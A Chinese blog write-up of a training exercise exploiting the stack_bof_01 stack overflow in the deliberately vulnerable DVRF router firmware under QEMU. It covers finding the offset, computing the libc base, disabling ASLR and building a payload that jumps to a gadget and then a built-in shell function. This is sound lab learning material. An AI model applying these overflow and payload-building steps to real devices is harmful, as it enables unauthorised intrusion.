DVRF-stack_bof_01

最新推荐文章于 2021-08-16 15:11:26 发布
最新推荐文章于 2021-08-16 15:11:26 发布
阅读量459 收藏
点赞数
分类专栏: IoT 文章标签: gdb iot mips
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40712959/article/details/110645219
版权

背景

DVRF(Damn Vulnerable Router Firmware)是一个不错的IoT固件漏洞平台

项目地址: https://github.com/praetorian-inc/DVRF

 

提取固件

binwalk -Me  DVRF_v03.bin

其提取出的文件系统是squashfs,存在漏洞的文件存放在pwnable/Intro下。

测试程序

cd squashfs-root

cp (which qemu-mipsel-static) .

sudo chroot . ./qemu-mipsel-static  ./pwnable/Intro/stack_bof_01 

可猜测其实际上是在程序后带上参数,将stack_bof_01放入物理的ida查看,代码最核心逻辑如下

可以看到调用strcpy函数,没有对长度进行限制,存在栈溢出漏洞。

测试漏洞

  1. 验证漏洞是否存在

python -c "print 'A'*1000" > payload

sudo chroot . ./qemu-mipsel-static   ./pwnable/Intro/stack_bof_01 (cat payload  )

可以看到程序报错,存在栈溢出漏洞。

2.测试溢出偏移

python ~/hhh/shellcode_tools/patternLocOffset.py -l 1000 -c -f payload

sudo chroot . ./qemu-mipsel-static  -g 6666 ./pwnable/Intro/stack_bof_01  (cat payload) #开启监听,等待远程gdb调试

将待调试文件stack_bof_01拖拽至物理机中,打开物理机上运行的ida,配置ida远程调试,其中hostname为虚拟机IP地址,端口号为监听端口号,这里是6666

开启远程调试,F9运行程序,程序崩溃,查看此时$RA,为0x41386741

python ~/hhh/shellcode_tools/patternLocOffset.py -l 1000 -s 0x41386741

偏移为204,程序自带后门函数,即dat_shell,地址为0x00400950,即可构造payload

3.构造payload

python -c "print 'a'*204+'\x50\x09\x40\x00'" >payload 

sudo chroot . ./qemu-mipsel-static  -g 6666 ./pwnable/Intro/stack_bof_01  (cat payload)

同样远程调试,程序成功跳转至dat_shell,但依旧崩溃,如下图;参考路由器漏洞挖掘之栈溢出入门(二)路由器漏洞靶场 The Damn Vulnerable Router Firmware Project 的学习,因为我们溢出的时候把 $gp 寄存器也覆盖了,$gp 寄存器是用来全局指针寻址用的,覆盖了他就会导致程序无法正常寻址,自然程序就会 crash。

在这里由于我的mipsrop插件问题无法在ida中查找libc.so.0中的gadget,但是使用ida打开lib/下的libc.so.0,其偏移0x6b20处确实有一个gadget,

故只需要确定运行时libc基地址即可

4.确定基地址

这里需要用到gdb-multiarch本地调试mips程序

命令行1:

echo 0 > /proc/sys/kernel/randomize_va_space #由于是本地学习漏洞,可关闭aslr降低难度

sudo chroot . ./qemu-mipsel-static  -g 6666 ./pwnable/Intro/stack_bof_01  (cat payload)

命令行2:

gdb-multiarch ./pwnable/Intro/stack_bof_01

set architecture mips

set endian little

target remote 127.0.0.1:6666 #开启远程调试

vmmap #查看内存布局

可以看到这里不知为何我的内存布局没有显示出libc,所以需要寻找另一方法确定libc基址

p &memset #查看memset地址,为0x408b6e10。(友情提示,需要在memset处下断点,运行至memset,不然由于之前没有运行memset,memset地址为其got地址)

ida打开libc.so.0,查看memset偏移为0x0001BE10 

则libc基地址为:0x408b6e10-0x0001BE10=0x4089b000

gadget地址为 :0x4089b000+0x6b20=0x408a1b20

5.最终payload

python -c "print 'a'*204+'\x20\x1b\x8a\x40'+'\x50\x09\x40\x00'" > payload
sudo chroot . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01  (cat payload)

hhhnoone
关注
专栏目录
路由器DVRF固件漏洞分析与学习
hcu5555的专栏
06-08 693
git clone https://github.com/praetorian-code/DVRF.git 1287 ls 1288 cd DVRF 1289 ls 1290 cd Source\ Code 1291 ls 1292 cd ../ls 1293 ls 1294 cd ../ 1295 ls 1296 cd Firmware 1297 ls 1298 binwalk -Me DVRF_v03.bin 1299 ls 1300 cd...
DVRF_Intro_stack_bof_01
Starr
04-06 2001
文章目录1. 环境2. 提取固件3. stack_bof_01小练信息收集黑盒测试反汇编payload 这篇笔记是第一次固件分析的记录。 1. 环境 QEMU环境请参考另一篇博客:https://blog.csdn.net/Ga4ra/article/details/123959989 下载DVRF:ttps://github.com/praetorian-inc/DVRF。可以从gitee上搜一下,有很多镜像。 2. 提取固件 目录: starr@starr-VirtualBox:~/Documents/
DVRF:路由器漏洞练习靶机 Damn Vulnerable Router Firmware
weixin_33801856的博客
01-24 372
01 概述 这个项目的目的是来帮助人们学习X86_64之外其他架构环境,同时还帮助人们探索路由器固件里面的奥秘。 目前为止,该项目是基于Linksys E1550 为基础进行安装。 0×02 安装 友情提示,安装前请先备份路由器固件,以备不时之需。 1、使用管理员帐户密码登录E1550 2、访问固件更新页面,http://192.168.1.1/...
以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用
weixin_33862993的博客
09-12 400
本文讲的是以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用, 在本文中,我将介绍JEB的MIPS反编译器是如何帮助你查找和利用嵌入式设备中的软件漏洞。 DVRF DVRF(Damn_Vulnerable_Router_Firmware) 是一个基于路由器Linksys E1550的路由器固件,里面包含了开发者写的一些存在漏洞的二进制文件,可以在路...
从DVRF靶机学习固件安全
蚁景网安学院
03-19 756
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
bacnet-stack-0_bacnet-stack_bacnetexample_BACNETRelease_jackqwc_
12-31
该BACnet协议栈库 提供了BACnet应用层,网络层和媒体访问(MAC)层通信服务。它是适用于嵌入式系统,Windows,Linux或其他操作系统的开源免版税库。 包括示例BACnet客户端和服务器应用程序。
Z-Stack_Home_1.2.2a.part3.rar
11-18
TI公司提供2015年11月最新基于ZigBee无线智能家居开发协议(Z_Stack_Home_1.2.2a.exe) 由于只能上传小于60MB文件,将150MB原文件分割3个部分上传,分别为: Z_Stack_Home_1.2.2a.exe.part1.rar Z_Stack_Home_1.2.2a....
leetcodepushfront-stack_w_2_queues:stack_w_2_queues
07-07
推前stack_w_2_queues 力码 编队 /* Q. Implement the following operations of a stack using queues: - push(x): Push element x onto stack. - pop(): Removes the element on top of the stack. - top(): Get ...
Z-Stack_Home_1.2.2a.part2.rar
11-18
TI公司提供2015年11月最新基于ZigBee无线智能家居开发协议(Z_Stack_Home_1.2.2a.exe) 由于只能上传小于60MB文件,将150MB原文件分割3个部分上传,分别为: Z_Stack_Home_1.2.2a.exe.part1.rar Z_Stack_Home_1.2.2a....
Z-Stack_Home_1.2.2a.zip(3)
08-11
zigbee协议栈
DVRF靶机系列(1)搭建
m0_51193993的博客
07-07 314
前言 随着各种硬件设备漏洞越来越被人们关注,以及被恶意攻击者大量利用。作为一个安全研究员,学习分析固件漏洞,及时预警修补漏洞变得越来越重要。这个系列文章将通过利用DVRF来一步一步的深入固件分析,笔者也是一位初学者,记录在学习的过程中遇到的一些问题,希望与大家一起进步。 DVRF是一个非常好的项目,这个项目的目的是来帮助人们学习X86_64之外其他架构环境,同时还帮助人们探索路由器固件里面的奥秘。 前期环境准备 由于此步骤非常简单,相信有点基础的同学都能够搞定,因此我就不细说这个过程,只要你按照我给的环境配
漏洞payload 靶机_以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用-阿里云开发者社区...
weixin_42413447的博客
12-23 247
本文讲的是以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用,在本文中,我将介绍JEB的MIPS反编译器是如何帮助你查找和利用嵌入式设备中的软件漏洞。DVRFDVRF(Damn_Vulnerable_Router_Firmware) 是一个基于路由器Linksys E1550的路由器固件,里面包含了开发者写的一些存在漏洞的二进制文件,可以在路由器中安装该固件进行安全测试。DVRF模拟了一个比较...
物联网IoT安全教程(三)-- 动态分析IoT固件
安全杂货铺
01-15 2366
PS:本文所用到的程序见 – https://github.com/G4rb3n/IoT_Sec_Tutorial 动态分析固件之前,需要先把固件运行起来,但我们手头又没有路由器、摄像头之类的物联网硬件,该如何运行呢?这就需要虚拟执行,虚拟执行你就把它想象成一个虚拟机可以运行各种物联网OS就是了。虚拟执行IoT固件需要用到firmadyne工具,该工具很难安装,在kali上安装一直报错,你们可以尝...
动态分析IoT固件(三)
weixin_43047908的博客
08-16 1430
目录前言 前言 动态分析固件之前,需要先把固件运行起来,但我们手头又没有路由器、摄像头之类的物联网硬件,该如何运行呢?这就需要虚拟执行,虚拟执行你就把它想象成一个虚拟机可以运行各种物联网OS就是了。 QEMU这个模拟器想必都不陌生,一个近乎能够模拟所有硬件设备的软件,而Firmadyne这个工具,是一个基于QEMU的分析平台,包含模拟、固件提取、调试等功能。 但该工具很难安装,在kali上安装一直报错,人麻了。。。最终选择用attifyti提供的物联网渗透专用虚拟机,下载下来的文件直接用vmware导入就行
路由器漏洞挖掘之栈溢出入门(三)-- ROP 链的构造
abc380620175的博客
03-16 1295
前言 DVRF 的第二个栈溢出程序是 stack_bof_2,这题和上一道题的差异就在于这道题没有给我们后门函数,需要自己构造 shellcode 来进行调用。 README 文件里也做了说明,所以这里的重点是 ROP 链的构造以及 sleep(1) 的用法。 确定偏移 和上一道题一样,首先我们需要确定 ra 的偏移。 使用 patternLocOffset.py 生成 500 个长度...
路由器漏洞靶场 The Damn Vulnerable Router Firmware Project 的学习(持续更新)
qq_41071646的博客
08-06 589
看wiki 感觉看的也还行了 打算最近把 攻防世界的题 再看看 然后去肝一下buuctf上面的题目 然后 发现了一个 这个 路由器漏洞靶场 里面有源代码 还有编译好的 程序 然后 里面一共有三个 这里面也有三个 这里 从名字也能看出来利用的漏洞种类 这个项目的地址, https://github.com/praetorian-inc/DVRF 这里面还有源...
路由器漏洞挖掘之栈溢出入门(二)
abc380620175的博客
03-03 575
前言 最后在学习 MIPS 漏洞挖掘的过程中,找到了一个不错的靶机平台 The Damn Vulnerable Router Firmware Project 项目地址:https://github.com/praetorian-inc/DVRF The goal of this project is to simulate a real world environment to he...
路由器漏洞复现分析第三弹:DVRF INTRO题目分析
weixin_34202952的博客
03-20 175
这个项目的目的是来帮助人们学习X86_64之外其他架构环境,同时还帮助人们探索路由器固件里面的奥秘。 本文通过练习DVRF 中INTRO 部分的题目来学习下MIPS 结构下的各种内存攻击。 DVRF:路由器漏洞练习靶机 用binwalk解压DVRFbin后,题目位于如下目录中   调试环境配置参考本系列中的前面两篇文章: 通过CVE-2017-17215学习路由器漏洞分析,从入坑到放弃 路由器...
bsub -b -I -q q_sw_cpc2023 -shared -n 1 -cgsp 64 -host_stack 1024 -share_size 15000 ./pcg_solve
最新发布
06-10
这是一个使用 LSF(Load Sharing Facility)系统提交作业的命令,其中各个参数的含义如下: - `-b` 表示将作业提交到后台运行。 - `-I` 表示在作业运行期间保持标准输入开放。 - `-q q_sw_cpc2023` 表示将作业提交到名为 q_sw_cpc2023 的队列中。 - `-shared` 表示作业运行在共享模式下。 - `-n 1` 表示作业占用一个计算节点。 - `-cgsp 64` 表示将计算资源按照64个核心的比例分配给作业。 - `-host_stack 1024` 表示设置作业的堆栈大小为1024KB。 - `-share_size 15000` 表示设置作业运行所需的最大内存限制为15000MB。 - `./pcg_solve` 表示要运行的程序名称及其路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值